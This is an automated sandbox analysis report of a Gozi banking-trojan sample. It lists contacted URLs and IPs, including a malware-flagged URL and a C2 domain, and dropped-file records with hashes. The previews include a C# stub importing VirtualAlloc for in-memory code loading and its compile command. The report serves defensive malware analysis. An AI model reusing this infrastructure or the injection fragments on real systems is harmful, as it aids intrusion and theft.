http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH	RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designersG	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://ns.adobp/	RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://constitution.org/usdeclar.txtC:	RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.tiro.com	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.cmgR	RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://transfer.sh	gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://transfer.sh	gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txt	RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.ux2	RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://transfer.sh4jl	gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	false		high
http://ns.micro/1	RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
185.189.12.123	io.immontyr.com	Russian Federation		50113	SUPERSERVERSDATACENTERRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	551701
Start date:	12.01.2022
Start time:	13:00:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	gozi.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winEXE@35/22@10/2
EGA Information:	Successful, ratio: 83.3%
HDC Information:	Successful, ratio: 23% (good quality ratio 22.5%) Quality average: 82.3% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 253 Number of non-executed functions: 279
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Execution Graph export aborted for target mshta.exe, PID 2928 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:01:33	API Interceptor	1x Sleep call for process: gozi.exe modified
13:02:05	API Interceptor	3x Sleep call for process: RegAsm.exe modified
13:02:20	API Interceptor	43x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log Download File
Process:	C:\Users\user\Desktop\gozi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.356708753875314
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5:	3197B1D4714B56F2A6AC9E83761739AE
SHA1:	3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256:	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512:	58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\3B0F.bi1 Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	120
Entropy (8bit):	4.530397332961481
Encrypted:	false
SSDEEP:	3:cPaRhARtt7TSjjhThARtuV/gRLwvI11/v:oMWbtChWb0gRLwQL/v
MD5:	1658AC427436559C818CE024565FC43B
SHA1:	8ECC6A8B9512D66EC9816669273CD2934075ADA8
SHA-256:	6AE6B137C04602F2D9D5191E3F6E8F54FB4E9D1FA63C3061CCF909A30966ADDD
SHA-512:	6D0C4CDA4C43B32226643D2C19871D1CEF506612B2C3B5DF3241A7A7E654D4149B9F3582F484DB12D577E5C27D7AC45784786726948A2C3401CBA59FC43216E1
Malicious:	false
Reputation:	unknown
Preview:	Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 102.129.143.64....-------- ..

C:\Users\user\AppData\Local\Temp\5n300s0s.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	394
Entropy (8bit):	4.993235973617522
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJlMRSRa+eNMjSSRrJ90SRNmbPJjxVnQy:V/DTLDfu/9eg5rJ9kbx92y
MD5:	030386E2BD305EC55BEE50D72051A0C2
SHA1:	618FE858F3B7B1296E760EE21969463861B875E3
SHA-256:	2DABA5D5466729FE4AD5753FBB2F95BC486F9AF12A59516BA175F6FF2062CE44
SHA-512:	0017F802613E78C762F43480581E4F92433F39DF07C402BDF462E6AD0310375D62AE782C605A2EAAF646783F070858B1F1AC358CC8394422C04C72C160E0067A
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class manpsxef. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint nuqydsqashe,uint kwyh);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ajoo,uint wdjqctev,uint veunxb,uint fsepp);.. }..}.

C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.23048440708271
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fyzxs7+AEszIWXp+N23fsA:p37Lvkmb6KH6WZE8f
MD5:	058C6409B55A3272B281DD66A1836169
SHA1:	41EC7E456D84A1256A98B5C4A265A9FFB4E652B5
SHA-256:	BDCE0FEF36E9B3E61B8C0FFA6AE77766B5E6D3491C48B3ED8ACFF6A6F08944B1
SHA-512:	F751793C7204FB6C49201E778342F0E7208430EB8A0181B206A6CBDB72BCB8090E2D79AB0F791854BCD4030DA78E9B5658BE42BC3E1B90986F5BE0BB1200467C
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5n300s0s.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5n300s0s.0.cs"

C:\Users\user\AppData\Local\Temp\5n300s0s.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.5958443880784277
Encrypted:	false
SSDEEP:	24:etGSq/W2dg85n+QRW4+hOdWDOyFWHEtkZfqBBr0+WI+ycuZhNNGakSsXPNnq:6/kb5+QReKWKyW7JqYl1uloa3kq
MD5:	D946993F47784F9E8727577D58C6B065
SHA1:	853445BA684F35E59B89D0FD5EBC04A266394175
SHA-256:	0FC0E5ED70D2AD453D22DA38C742970F1E390C4D44A69B6CF46A9C6CA102B845
SHA-512:	65E7555AA0DA658EF64FD6C67AF9168750F0157D9FAC6F5DAB05F96732E37F2F3411622316C90F46E33877273FA85919920DEDB17A03FB0137D8BBA8F3EC4070
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ M............ U.....P ......b.........h.....t.....y.....~...............b. ...b...!.b.%...b............3.-.....;.......M.......U...........

C:\Users\user\AppData\Local\Temp\5n300s0s.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.316959711953796
Encrypted:	false
SSDEEP:	12:xKIR37Lvkmb6KH6WZE8GKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHbE8GKaM5DqBVKVrdFAMBJTH
MD5:	FFBD7395F541E9292620BE41E7B60BC6
SHA1:	F88961F2BB9BB564D928AB202C079D199F8C2461
SHA-256:	70BA1D1E6607E9F5C24E2B1B9644868ECC6F94D27F959582927FFCD83CF118EA
SHA-512:	B73C098B39DD1B75EF2DDEA939CB7E7FA952CB319580C7C2ADC6AE7DF138FA2D1BD19B6B30B69205C5FAB1747290E41D82CF004FB15D228BF9EFFFDF9C0F7EE7
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5n300s0s.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5n300s0s.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.070551977275083
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUmGak7YnqqlmXPN5Dlq5J:+RI+ycuZhNNGakSsXPNnqX
MD5:	4DD4A6AF96C02C85FC1B4A3BCAF6D199
SHA1:	AF08B5DB30EDD73F8124F37CA13C1AB739511C7B
SHA-256:	4CBD308EA2CEF31935CB7502488B37D1570A50CCF1C21E29A1755A28A9E3DF83
SHA-512:	5C5B182C7840841B990CFB5627C60E7123C3AABB400EC72478275B2D22779E26182FC27EF252EBEFBB475983ACC2A4EE741484281ABB67295D088DF148CDAF61
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.n.3.0.0.s.0.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.n.3.0.0.s.0.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.085252687053476
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6dak7Ynqq/yPN5Dlq5J:+RI+ycuZhNMdakS/yPNnqX
MD5:	F17798721D9D8097A6CAFFCFE55C2B52
SHA1:	324AE9044C5E8CB1BDC3C4387D76E709CF2E2596
SHA-256:	20111EB796E35ADE092F0EB11B0094ACD1ADF0E314FB3BCD00B18E6D6691CF4E
SHA-512:	15D67C5025F4FE0664383E4D11B0838CF1F65AE8B7C319914E765A4D3B3591EADB6E30AB0723BFA8DE4459D2AC1FD5F24DD59F8B231A7A7DC73937543E04BAED
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.s.c.a.n.3.4.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.s.c.a.n.3.4.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES73F8.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9747614955739956
Encrypted:	false
SSDEEP:	24:HvnW9rIhJJ1hH1hKdNWI+ycuZhNMdakS/yPNnq9hgd:/WIhvDKd41ulMda3/eq9y
MD5:	E50591F2515FD6E3BEA0353DAB5D673A
SHA1:	DCB1415CF1CF92D75A6F7E84B69A0E3128C00F40
SHA-256:	8148523D8A0A2E8A445C227BF54B7644D1383DF82EA251B69972597E0EFE5846
SHA-512:	252353EA877404BD8BD9ACA4DFC912B3BD1DA103158E87A5E6E89EB96B872F220572441ECD6353F9DD45B8C82B1EC01E2C365BCC17FB7945D3F057838638C029
Malicious:	false
Reputation:	unknown
Preview:	L....A.a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP.................w.r.........\+R..........4.......C:\Users\user\AppData\Local\Temp\RES73F8.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.s.c.a.n.3.4.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RES8712.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.986906757782769
Encrypted:	false
SSDEEP:	24:HQnW9r0ZJXXhHdxhKdNWI+ycuZhNNGakSsXPNnq9hgd:mW0J9/Kd41uloa3kq9y
MD5:	3A3F3DA7DC5DB0BFDABCB2560F30248D
SHA1:	D3B2AE662A7577A2852CBCCC7DFDB1735197025B
SHA-256:	49563F9489033AE40978A64856F6A6A87616F394F4D494D819A9CA9E4E8859BF
SHA-512:	B62BB815D315428A8EBCB4B9FED77776BA8F32AEA6E22463D46E6A4DF903AC683059868D608AB188E92F3EDB791D98B00ED6E9F7D19869A2463035C930216171
Malicious:	false
Reputation:	unknown
